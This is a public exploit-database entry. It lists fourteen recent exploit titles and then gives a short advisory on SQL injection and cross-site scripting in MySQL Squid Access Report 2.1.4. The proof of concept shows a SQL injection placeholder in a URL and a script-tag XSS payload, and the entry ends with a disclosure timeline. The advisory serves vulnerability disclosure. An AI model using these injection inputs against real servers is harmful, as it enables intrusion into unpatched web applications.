e8f4ef9188
14 changes to exploits/shellcodes PDFunite 0.41.0 - '.pdf' Local Buffer Overflow RSVG 2.40.13 / 2.42.2 - '.svg' Buffer Overflow VX Search 10.6.18 - 'directory' Local Buffer Overflow Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution (Metasploit) Drupal < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution (Metasploit) Easy File Sharing Web Server 7.2 - Stack Buffer Overflow Coship RT3052 Wireless Router - Persistent Cross-Site Scripting Drupal < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution MySQL Squid Access Report 2.1.4 - SQL Injection / Cross-Site Scripting Rvsitebuilder CMS - Database Backup Download Match Clone Script 1.0.4 - Cross-Site Scripting Kodi 17.6 - Persistent Cross-Site Scripting Lutron Quantum 2.0 - 3.2.243 - Information Disclosure WordPress Plugin Caldera Forms 1.5.9.1 - Cross-Site Scripting Joomla! Component JS Jobs 1.2.0 - Cross-Site Request Forgery Geist WatchDog Console 3.2.2 - Multiple Vulnerabilities
24 lines
No EOL
703 B
Text
24 lines
No EOL
703 B
Text
# Exploit Title: MySQL Squid Access Report 2.1.4 Multiple Vulnerabilities
|
|
# Date: 14-13-2018
|
|
# Software Link: https://sourceforge.net/projects/mysar/
|
|
# Exploit Author: Keerati T.
|
|
# Version: 2.1.4
|
|
# Tested on: Linux
|
|
|
|
1. Description
|
|
SQL injection and Cross site script vulnerabilities are found on ALL
|
|
parameter of MySAR.
|
|
|
|
2. Proof of Concept
|
|
FOR EXAMPLE
|
|
- SQL injection
|
|
http://server/mysar/index.php?a=IPSummary&date=[SQLi]
|
|
-XSS
|
|
http://server/mysar/index.php?a=IPSummary&date=2018-04-14
|
|
"><script>alert(1)</script>
|
|
|
|
3. Timeline
|
|
8-3-2018 - Report on their Github. (
|
|
https://github.com/coffnix/mysar-ng/issues/12)
|
|
-- 1 month later, no any response from vendor. --
|
|
14-4-2018 - Public. |